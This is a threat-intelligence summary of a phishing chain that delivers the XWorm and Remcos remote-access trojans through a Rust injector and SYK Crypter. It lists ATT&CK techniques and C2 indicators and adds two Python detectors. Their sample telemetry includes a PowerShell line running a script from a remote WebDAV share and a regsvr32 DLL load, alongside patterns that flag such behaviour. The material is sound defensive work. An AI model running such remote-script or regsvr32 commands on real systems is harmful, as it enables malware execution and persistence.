FortiGuard Labs identified a Rust injector chain that loads XWorm and Remcos via SYK Crypter, delivered through a phishing workflow starting with a malicious PDF. The operation leverages the Red Team tool Freeze.rs, Base64/LZMA encoding, and PowerShell to bypass defenses and deploy a dual-RAT capability with C2 hosted on Pastebin.
#FreezeRS #SYKCrypter #XWorm #Remcos #DriveHQ #LNK #PowerShell #Pastebin
Keypoints
- The attacker uses a Rust injector (doc.dll) linked to the Red Team tool Freeze.rs to bypass EDR controls and load shellcode.
- SYK Crypter is used to deliver Remcos after initial Rust-based injection, with RC4, AES, or LZMA encryption options for evasion.
- A phishing email delivers a malicious PDF that redirects to an HTML file, which uses the search-ms protocol to load a remote LNK file that triggers PowerShell execution.
- The PowerShell chain launches the injector via regsvr32, opens a decoy PDF, and then executes AA.exe, leading to shellcode injection.
- Persistence is achieved by copying the MSIL downloader to Startup and adding a Run registry entry.
- XWorm and Remcos provide post-compromise remote access capabilities; their C2 configuration is retrieved from Pastebin, and both payloads contact the same C2 server.
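The keypoints above describe a chain of host behaviours (PowerShell launched from a remote LNK, regsvr32 loading a DLL from a user-writable path, the injector spawning notepad.exe, a copy to the Startup folder and a Run entry under the "Windows NT\CurrentVersion\Windows" key) that each map to an observable event. The following Python is an added detection example, not FortiGuard's code or tooling: it parses constructed Sysmon-style key=value records (invented field values; the WebDAV share path and the `AA.exe` location are assumptions, not report-stated paths) and reports which techniques of the chain are present.

```python
"""Behavioural detection for the Freeze.rs / SYK Crypter chain (added example).

Input: Sysmon-style records as "Key=Value" text lines, values quoted when they
contain spaces. Sample data below is constructed and is not report telemetry.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry mirroring the reported chain, plus two benign events.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\explorer.exe ParentImage=C:\Windows\System32\userinit.exe CommandLine="C:\Windows\explorer.exe"',
    # Assumption: the remote LNK runs pf.ps1 from a WebDAV share (host/share are placeholders).
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine="powershell.exe -File \\203.0.113.10@80\DavWWWRoot\share\pf.ps1"',
    r'EventID=1 Image=C:\Windows\System32\regsvr32.exe ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="regsvr32 /s C:\Users\Public\doc.dll"',
    r'EventID=1 Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\System32\regsvr32.exe CommandLine="notepad.exe"',
    r'EventID=11 Image=C:\Users\Public\AA.exe TargetFilename="C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AA.exe"',
    r'EventID=13 Image=C:\Users\Public\AA.exe TargetObject="HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Run" Details="C:\Users\Public\AA.exe"',
    r'EventID=1 Image=C:\Windows\System32\regsvr32.exe ParentImage=C:\Windows\System32\msiexec.exe CommandLine="regsvr32 /s C:\Program Files\Vendor\vendor.dll"',
]

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
STARTUP_DIR = re.compile(r'\\Start Menu\\Programs\\Startup\\[^\\]+\.exe$', re.I)
PERSIST_KEY = re.compile(r'^HKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\', re.I)
USER_WRITABLE = re.compile(r'^(C:\\Users\\|\\\\)', re.I)      # profile dirs or UNC paths
REMOTE_SCRIPT = re.compile(r'\\\\\S+\.ps1', re.I)              # .ps1 fetched from a UNC/WebDAV path
DLL_ARG = re.compile(r'(\S+\.dll)', re.I)

Finding = Tuple[str, str]  # (ATT&CK technique id, human-readable reason)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one Key=Value record into a dict (quoted or bare values)."""
    return {k: (q or u) for k, q, u in KV.findall(line)}


def basename(path: str) -> str:
    return path.rsplit('\\', 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> List[Finding]:
    """Apply the chain's behavioural rules to a single parsed event."""
    findings: List[Finding] = []
    eid = ev.get('EventID')
    image = basename(ev.get('Image', ''))
    parent = basename(ev.get('ParentImage', ''))
    cmd = ev.get('CommandLine', '')
    if eid == '1':  # process creation
        if image == 'powershell.exe' and parent == 'explorer.exe' and REMOTE_SCRIPT.search(cmd):
            findings.append(('T1059.001', 'PowerShell launched from Explorer with a script on a remote share'))
        if image == 'regsvr32.exe':
            m = DLL_ARG.search(cmd)
            from_user_path = bool(m and USER_WRITABLE.match(m.group(1)))
            if from_user_path or parent == 'powershell.exe':
                findings.append(('T1218.011', f'regsvr32 loading {m.group(1) if m else "a DLL"} (parent {parent})'))
        if image == 'notepad.exe' and parent == 'regsvr32.exe':
            findings.append(('T1055', 'regsvr32 spawned notepad.exe: likely injection target'))
    elif eid == '11' and STARTUP_DIR.search(ev.get('TargetFilename', '')):  # file create
        findings.append(('T1547.001', 'executable written to the Startup folder'))
    elif eid == '13' and PERSIST_KEY.match(ev.get('TargetObject', '')):  # registry value set
        findings.append(('T1547.001', 'value set under Windows NT\\CurrentVersion\\Windows'))
    return findings


def analyze(lines: List[str]) -> Dict[str, object]:
    """Run all rules over the log and summarise which techniques of the chain were seen."""
    findings: List[Finding] = []
    for line in lines:
        findings.extend(check_event(parse_event(line)))
    return {'techniques': sorted({t for t, _ in findings}), 'findings': findings}


if __name__ == '__main__':
    summary = analyze(SAMPLE_EVENTS)
    for tech, reason in summary['findings']:
        print(f'[{tech}] {reason}')
    print('chain coverage:', summary['techniques'])
```

Each rule on its own is noisy (regsvr32 with a DLL argument is common in installers, as the benign msiexec-spawned event shows), so the summary keyed on the set of techniques seen on one host is what an analyst would alert on; the `USER_WRITABLE` and `REMOTE_SCRIPT` patterns are the tunable parts for a given environment.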
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The phishing email initiated the attack chain with a malicious PDF attachment. ‘The phishing email activity on July 13 initiated an attack chain using a malicious PDF file.’
- [T1059.001] PowerShell – The chain executes a PowerShell script to perform further offensive actions. ‘PowerShell script executes Freeze.rs and SYK Crypter for further offensive actions.’
- [T1218.011] Regsvr32 – regsvr32 is used to launch the injector (doc.dll) written in Rust. ‘The PowerShell script pf.ps1… using regsvr32 to launch the injector doc.dll.’
- [T1055] Process Injection – The injector creates a notepad.exe process and injects the shellcode into it via API calls. ‘The injection process begins with creating a “notepad.exe” process… The injector then injects the shellcode.’
- [T1547.001] Startup Items – Persistence is achieved by copying the MSIL downloader to the Startup folder and adding a Run registry entry. ‘For persistence, the malware appends the “.exe” extension to the file “AA” and copies the MSIL downloader to the “Startup” folder. It also adds a registry entry “Run” at “HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows.”’
- [T1562.001] Impair Defenses – AMSI and WLDP bypass techniques are applied in the decrypted shellcode so the dropped payload can execute. ‘The decrypted shellcode applies AMSI bypass and WLDP bypass techniques…’
- [T1071.001] Web Protocols – Both RATs communicate with the same remote C2 server, and the C2 configuration is hosted on Pastebin. ‘the C2 server IP address remains the same as the XWorm payload’s’ (C2 configuration observed on Pastebin)
Indicators of Compromise
- [Hostname] – freshinxworm[.]ddns[.]net, churchxx[.]ddns[.]net, plunder[.]ddnsguru[.]com, plunder[.]dedyn[.]io, plunder[.]jumpingcrab[.]com, plunder[.]dynnamn[.]ru
- [IP Address] – 95[.]214[.]27[.]17
- [Files] – 40c9d3dec84aa057c167005f860749a2cfa55faa0cddd2fe39aaf3906819203c, 5a47b18066d8dcd0fbc524f529002cf0a270d8394de928e8426fa06959a82704, and 2 more hashes
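The indicators above are published defanged (`[.]`), so they have to be refanged before they can be compared with DNS, proxy or file telemetry. The Python below is an added example, not FortiGuard's code: it refangs the hostnames, IP and hashes listed on this page and sweeps them over constructed log lines (timestamps, client addresses and the benign query are invented), treating a lookup of any subdomain of a listed hostname as a hit.

```python
"""Refang the page's IoCs and sweep them over Key=Value log lines (added example).

The IoC values are the ones listed on this page; the log lines are constructed.
"""
import re
from typing import Dict, List, Set, Tuple

# Indicators as published (defanged) on this page.
DEFANGED_HOSTS = [
    'freshinxworm[.]ddns[.]net', 'churchxx[.]ddns[.]net', 'plunder[.]ddnsguru[.]com',
    'plunder[.]dedyn[.]io', 'plunder[.]jumpingcrab[.]com', 'plunder[.]dynnamn[.]ru',
]
DEFANGED_IPS = ['95[.]214[.]27[.]17']
SHA256_HASHES = [
    '40c9d3dec84aa057c167005f860749a2cfa55faa0cddd2fe39aaf3906819203c',
    '5a47b18066d8dcd0fbc524f529002cf0a270d8394de928e8426fa06959a82704',
]

# Constructed sample log lines (not from the report): two DNS queries, one
# connection record and one file-hash record.
SAMPLE_LOG = [
    '2023-07-14T09:12:01Z src=10.0.0.5 query=freshinxworm.ddns.net type=A',
    '2023-07-14T09:12:02Z src=10.0.0.5 query=www.example.com type=A',
    '2023-07-14T09:12:05Z src=10.0.0.7 dst=95.214.27.17 proto=tcp',
    '2023-07-14T09:13:10Z host=ws-07 path=C:\\Users\\Public\\AA.exe sha256=40C9D3DEC84AA057C167005F860749A2CFA55FAA0CDDD2FE39AAF3906819203C',
    '2023-07-14T09:14:00Z src=10.0.0.9 query=cdn.plunder.dedyn.io type=A',
]

KV = re.compile(r'(\w+)=(\S+)')


def refang(value: str) -> str:
    """Undo the common defanging conventions: [.] and hxxp://."""
    return value.replace('[.]', '.').replace('hxxp://', 'http://').replace('hxxps://', 'https://')


def build_ioc_sets() -> Dict[str, Set[str]]:
    return {
        'hostname': {refang(h).lower() for h in DEFANGED_HOSTS},
        'ip': {refang(i) for i in DEFANGED_IPS},
        'sha256': {h.lower() for h in SHA256_HASHES},
    }


def match_hostname(name: str, hosts: Set[str]) -> bool:
    """Exact match or any subdomain of a listed hostname."""
    name = name.lower().rstrip('.')
    return name in hosts or any(name.endswith('.' + h) for h in hosts)


def sweep(lines: List[str], iocs: Dict[str, Set[str]] = None) -> List[Tuple[int, str, str]]:
    """Return (line_number, ioc_type, matched_value) for every field that hits an indicator."""
    iocs = iocs or build_ioc_sets()
    hits: List[Tuple[int, str, str]] = []
    for n, line in enumerate(lines, start=1):
        for key, value in KV.findall(line):
            if key in ('query', 'host', 'dst') and match_hostname(value, iocs['hostname']):
                hits.append((n, 'hostname', value))
            elif key in ('dst', 'src') and value in iocs['ip']:
                hits.append((n, 'ip', value))
            elif key == 'sha256' and value.lower() in iocs['sha256']:
                hits.append((n, 'sha256', value.lower()))
    return hits


if __name__ == '__main__':
    for n, kind, value in sweep(SAMPLE_LOG):
        print(f'line {n}: {kind} indicator {value}')
```

Matching on the hash is case-insensitive and the hostname check accepts subdomains because dynamic-DNS labels like those listed are frequently rotated under the same parent; an `src` or `dst` that is a hostname rather than an IP falls through to the hostname rule without raising.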
Read more: https://www.fortinet.com/blog/threat-research/malware-distributed-via-freezers-and-syk-crypter